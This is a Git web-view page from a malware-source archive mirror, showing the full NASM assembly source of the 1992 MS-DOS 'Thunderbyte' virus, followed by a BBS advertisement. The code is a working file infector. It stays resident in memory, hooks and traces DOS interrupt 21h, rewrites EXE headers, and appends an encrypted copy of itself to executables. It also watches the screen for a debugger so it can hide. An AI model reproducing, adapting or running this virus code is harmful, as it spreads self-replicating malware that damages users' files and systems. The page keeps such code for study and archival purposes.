ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71de2a7087
MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.tbyte.asm

613 lines
9.5 KiB
NASM
Raw Normal View History

re-organize push
2022-08-21 09:07:57 +00:00
;*****************************************************************************;
; ;
; Tunderbyte Virus ;
; ;
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
; ;
;*****************************************************************************;
virus segment public 'code'
assume cs:virus, ds:virus, es:virus
org 0
VirusStart equ $
VirusSize1 equ (VirusEnd1-$)
VirusSize2 equ (VirusEnd2-$)
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
db 80h,76h,Decrypt2-VirusStart-1,0
db 4dh,75h,-7
Decrypt2: cli
mov sp,offset DoAgain-2
ret -8
db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dl,byte ptr cs:Decrypt1[6]
mov dh,dl
mov si,offset StartEncrypt
NotReady: ret 2
DecryptWord: mov ax,ss:[si]
xor cs:[si],dx
NextWord: add dx,ax
inc si
ret -4
dw DecryptWord
dw DoAgain
dw NextWord
dw Init
DoAgain: loop NotReady
StartEncrypt equ $
Main: mov sp,1000h
sti
push ds
push es
mov ax,03031h
mov bx,0DEADh
int 21h
cmp ax,0DEADh
jne Install
jmp Exit
Install: push es
mov ah,52h
int 21h
mov ax,es:[bx-2]
mov cs:FirstMCB,ax
pop es
CheckBlock: mov ds,ax
inc ax
cmp word ptr ds:[1],ax
jne NextBlock
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
jne NextBlock
push ax
push es
mov cx,VirusSize2
xor di,di
mov es,ax
mov al,es:[di]
cld
repe scasb
pop es
pop ax
je CopyVirus
NextBlock: add ax,ds:[3]
cmp byte ptr ds:[0],'Z'
jne CheckBlock
mov ah,4ah
mov bx,-1
int 21h
mov ah,4ah
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
int 21h
mov ah,48h
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
int 21h
CopyVirus: push cs
pop ds
dec ax
mov es,ax
inc ax
mov es:[1],ax
mov cx,8
mov si,offset CommandStr
mov di,cx
cld
rep movsb
mov es,ax
EncryptZero: inc byte ptr ds:Decrypt1[6]
jz EncryptZero
mov cx,VirusSize2
xor si,si
xor di,di
cld
rep movsb
push es
call ReturnFar
xor ax,ax
mov ds,ax
cli
mov ax,offset DebugWatch
xchg ax,ds:[20h]
mov cs:OldInt8o,ax
mov ax,cs
xchg ax,ds:[22h]
mov cs:OldInt8s,ax
sti
push ds:[4]
push ds:[6]
mov word ptr ds:[4],offset Trace1
mov word ptr ds:[6],cs
pushf
push cs
mov ax,offset Return4
push ax
cli
pushf
pop ax
or ax,100h
push ax
push ds:[86h]
push ds:[84h]
mov ah,52h
Trace1: push bp
mov bp,sp
push ax
push ds
push cs
pop ds
mov ax,FirstMCB
cmp [bp+4],ax
jae Return1
mov ax,[bp-2]
mov RegAX,ax
mov RegSP,bp
mov ax,[bp+2]
mov OldInt21o,ax
mov ax,[bp+4]
mov OldInt21s,ax
xor ax,ax
mov ds,ax
mov word ptr ds:[4],offset Trace2
mov word ptr ds:[6],cs
jmp short Trace3
Return1: jmp short Return3
Trace2: push bp
mov bp,sp
push ax
push ds
cmp ax,cs:RegAX
jne Return3
cmp bp,cs:RegSP
jne Return3
Trace3: push bx
push dx
lds bx,[bp+2]
mov al,[bx]
mov dx,[bx+1]
inc dx
cmp al,0e9h
je JumpOpcode
cmp al,0e8h
je CallOpcode
xchg ax,dx
dec ax
cbw
xchg ax,dx
cmp al,0ebh
je JumpOpcode
cmp al,70h
jb Return2
cmp al,7fh
ja Return2
JumpOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackJump
mov word ptr ds:[0cah],cs
jmp short Continue
CallOpcode: push ax
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[0c8h],offset HackCall
mov word ptr ds:[0cah],cs
Continue: pop ds
pop ax
mov cs:Displacement,dx
mov cs:Opcode,al
mov ax,32cdh
xchg ax,[bx]
mov cs:SavedCode,ax
mov cs:HackOffset,bx
mov cs:HackSegment,ds
and word ptr [bp+6],0feffh
Return2: pop dx
pop bx
Return3: pop ds
pop ax
pop bp
iret
Return4: pop ds:[6]
pop ds:[4]
mov cs:Handle,0
Exit: pop es
pop ds
mov ax,ds
add ax,10h
add cs:OldCS,ax
add ax,cs:OldSP
mov dx,cs:OldSP
cli
mov ss,ax
mov sp,dx
sti
jmp cs:OldEntry
ReturnFar: retf
OldEntry equ this dword
OldIP dw 0
OldCS dw -10h
OldSP dw 1000h
OldSS dw 0
HackAddress equ this dword
HackOffset dw ?
HackSegment dw ?
SavedCode dw ?
HackJump: call Interrupt21
push bp ; simulate a conditional or
push ax ; unconditional jump
mov bp,sp
mov ax,[bp+8]
and ax,0fcffh
push ax
db 0b8h ; mov ax,????
Displacement dw 0
popf
Opcode db 0ebh,3,0 ; j?? +3
xor ax,ax
nop
add [bp+4],ax
pop ax
pop bp
iret
HackCall: call Interrupt21
sub sp,2 ; simulate a call
push bp
mov bp,sp
push ax
mov ax,[bp+4]
inc ax
xchg ax,[bp+8]
xchg ax,[bp+6]
xchg ax,[bp+4]
add ax,cs:Displacement
mov [bp+2],ax
pop ax
pop bp
iret
Seek: mov ah,42h
xor cx,cx
xor dx,dx
Dos: pushf
db 9ah
OldInt21o dw ?
OldInt21s dw ?
ret
DosVersion: cmp ax,3031h
jne NotTByte
cmp bx,0DEADh
jne NotTByte
mov ax,0DEADh
add sp,8
iret
Interrupt21: cmp ah,30h
je DosVersion
push si
push ds
push cs:SavedCode
lds si,cs:HackAddress
pop ds:[si]
pop ds
pop si
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3eh
je CloseFile
cmp ah,40h
je WriteFile
Old21: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
push si
push ds
lds si,cs:HackAddress
mov word ptr ds:[si],32cdh
pop ds
pop si
NotTByte: ret
WriteFile: mov ax,4400h
call Dos
cmp dl,7fh
ja Error1
mov al,1
call Seek
jc Error1
or dx,dx
jnz Error1
cmp ax,17h
ja Error1
push cs
pop es
mov si,dx
mov di,offset Signature
add di,ax
cmp word ptr [si],"ZM"
jne Error1
cmp word ptr [si+12h],0DEADh
je Error1
cmp cx,18h
jb CheckHandle
or ax,ax
jz Ok
CheckHandle: cmp bx,cs:Handle
jne Error1
Ok: add cx,ax
cmp cx,18h
jbe CountOk
mov cx,18h
CountOk: sub cx,ax
jbe Error1
cld
rep movsb
mov cs:Handle,bx
Error1: jmp Old21
CloseFile: push cs
pop ds
push cs
pop es
mov ax,4400h
call Dos
test dl,80h
jne Error1
or bx,bx
je Read
cmp cs:Handle,bx
je DoNotRead
Read: xor al,al
call Seek
jc Error1
mov ah,3fh
mov cx,18h
mov dx,offset Signature
call Dos
jc Error1
DoNotRead: mov cs:Handle,0
cmp Signature,"ZM"
jne Error1
cmp ChkSum,0DEADh
je Error1
mov ax,ExeIP
mov OldIP,ax
mov ax,ExeCS
mov OldCS,ax
mov ax,ExeSS
mov OldSS,ax
mov ax,ExeSP
mov OldSP,ax
mov al,2
call Seek
jc Error1
push ax
push dx
mov cx,200h
div cx
cmp PartPage,dx
jne SizeError
add dx,-1
adc ax,0
cmp PageCount,ax
SizeError: pop dx
pop ax
jne Error2
add ax,0fh
adc dx,0
and ax,0fff0h
mov cx,dx
mov dx,ax
mov ax,4200h
call Dos
jnc SeekOk
Error2: jmp Old21
SeekOk: mov cx,10h
div cx
sub ax,HdrSize
mov ExeCS,ax
mov ExeIP,offset Decrypt1
mov ExeSS,ax
mov ExeSP,VirusSize1+400h
cmp MinMem,40h
jae MemoryOk
mov MinMem,40h
cmp MaxMem,40h
jae MemoryOk
mov MaxMem,40h
MemoryOk: push ds
push es
mov ax,cs
mov ds,ax
add ax,(VirusSize2+0fh)/10h
mov es,ax
mov cx,VirusSize1
xor si,si
xor di,di
cld
rep movsb
mov ds,ax
mov cx,offset StartEncrypt-Decrypt2
mov dl,byte ptr ds:Decrypt1[6]
mov si,offset StartEncrypt-1
Again1: xor ds:[si],dl
dec si
loop Again1
mov cx,(VirusEnd1-StartEncrypt+1)/2
mov dh,dl
mov si,offset StartEncrypt
Again2: xor ds:[si],dx
mov ax,ds:[si]
add dx,ax
inc si
add dx,ax
inc si
loop Again2
mov ah,40h
mov cx,VirusSize1
xor dx,dx
call Dos
pop ds
pop es
jc Error3
mov al,2
call Seek
jc Error3
mov cx,200h
div cx
mov PartPage,dx
add dx,-1
adc ax,0
mov PageCount,ax
mov ChkSum,0DEADh
xor al,al
call Seek
jc Error3
mov ah,40h
mov cx,18h
mov dx,offset Signature
call Dos
Error3: jmp Old21
Count dw 8
DebugStr db 'DEBUG'
CommandStr db 'COMMAND '
DebugWatch: push ax
push cx
push dx
push si
push di
push ds
push es
dec cs:Count
jnz EndWatch
mov cs:Count,8
mov ax,0b000h
mov ds,ax
mov cx,2
push cs
pop es
cld
NextScreen: push cx
mov cx,2000
xor si,si
mov di,offset DebugStr
NextChar1: mov dx,5
NextChar2: lodsb
inc si
and al,0dfh
scasb
jne CharOk
dec dx
jnz NextChar2
Alarm: pop cx
lds si,cs:HackAddress
cmp byte ptr ds:[si],0cdh
jne EndWatch
mov ax,cs:SavedCode
mov ds:[si],ax
xor cx,cx
mov ds,cx
mov ax,cs:OldInt8o
mov ds:[20h],ax
mov ax,cs:OldInt8s
mov ds:[22h],ax
mov es,cx
push cs
pop ds
mov cx,14
mov si,offset EndWatch-2
mov di,4f0h
push es
push di
rep movsb
xor di,di
mov cx,VirusSize2
push cs
pop es
retf
CharOk: neg dx
add dx,5
sbb di,dx
sub si,dx
sub si,dx
loop NextChar1
ScreenOk: mov ax,ds
add ax,800h
mov ds,ax
pop cx
loop NextScreen
jmp short EndWatch
rep stosb
EndWatch: pop es
pop ds
pop di
pop si
pop dx
pop cx
pop ax
db 0eah
OldInt8o dw ?
OldInt8s dw ?
db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
VirusEnd1 equ $
FirstMCB dw ?
RegAX dw ?
RegSP dw ?
Handle dw ?
Signature dw ?
PartPage dw ?
PageCount dw ?
ReloCnt dw ?
HdrSize dw ?
MinMem dw ?
MaxMem dw ?
ExeSS dw ?
ExeSP dw ?
ChkSum dw ?
ExeIP dw ?
ExeCS dw ?
VirusEnd2 equ $
virus ends
end Main

;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
Reference in New Issue Copy Permalink